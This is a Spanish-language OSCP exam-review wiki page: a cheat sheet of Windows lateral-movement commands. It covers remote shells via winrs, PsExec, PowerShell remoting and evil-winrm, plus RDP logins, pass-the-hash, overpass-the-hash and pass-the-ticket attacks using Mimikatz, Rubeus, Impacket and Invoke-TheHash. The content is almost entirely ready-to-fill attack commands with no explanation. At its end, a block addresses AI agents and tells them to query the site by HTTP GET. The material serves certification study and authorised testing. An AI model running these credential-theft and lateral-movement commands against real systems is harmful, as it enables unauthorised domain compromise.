# 6. Siguientes pasos

### 6.1. Tenemos acceso?

winrs

```powershell
winrs -r:<HOSTNAME> cmd
```

PsExec

```powershell
.\\PsExec.exe \\\\<HOSTNAME> cmd
```

PS-Script

```powershell
1- $sess = New-PSSession -ComputerName <HOST>
2- Enter-PSSession -Session $sess
```

Script Block

```powershell
1- $sess = New-PSSession -ComputerName <HOST>
2- Invoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}
```

WSManWinRM

```powershell
Invoke-WSManWinRM -hostname <HOST> -command cmd
```

### 6.2. Tenemos credenciales?

{% code overflow="wrap" %}

```powershell
winrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd
.\\PsExec.exe -u <Domain>/<USER> -p <PASS> \\\\<HOSTNAME> cmd
impacket-psexec <<Domain>/<USER>:<PASS>@<IP>>

#WSManWinRM
Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\\<USER> -password <PASS>

evil-winrm -i <IP> -u <Domain>/<USER>' -p <PASS>

#RDP Access
rdesktop -a 16 <IP> -u <DOMAIN\\USER> -p <PASS>
xfreerdp /v:IP /u:"<USER>" /p:<PASS>
```

{% endcode %}

### 6.3. Pass The Hash

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<> /ntlm:<NTLM> /run:powershell.exe"' 
impacket-psexec -hashes ":<NTLM>" <USER>@<IP>
evil-winrm -u <username> -H <Hash> -i <IP>
pth-winexe -U <Domain>/<User>%<NT:LM> //<IP> cmd

#Impacket For Win
.\\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>

#Invoke-TheHash
Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Doamin> -Username <> -Hash <NTLM> -Command '<Inj SHELL>' -verbose
```

{% endcode %}

### 6.4. OverPass The Hash (OPTH) O Pass The Key (PTK)

{% code overflow="wrap" %}

```powershell
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
.\\PsExec.exe -accepteula \\\\<HOST> cmd
winrs -r:<HOST> cmd

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe"'

1- impacket-getTGT <domain.full>/<USER> -hashes ":<NTLM>"
2- export KRB5CCNAME=$(pwd)/<USER>.ccache
3- impacket-psexec <domain.full>/<USER>@<IP> -k -no-pass
```

{% endcode %}

### 6.5. Pass The Ticket (PTT)

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt <C:\\Path\\To\\Ticket>"'
Rubeus.exe ptt /tikcet:<base64 Ticket>

#access
.\\PsExec.exe -accepteula \\\\<HOST> cmd
winrs -r:<HOST> cmd

```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.securiters.com/securiters-wiki/certificaciones/repaso-oscp/6.-siguientes-pasos.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.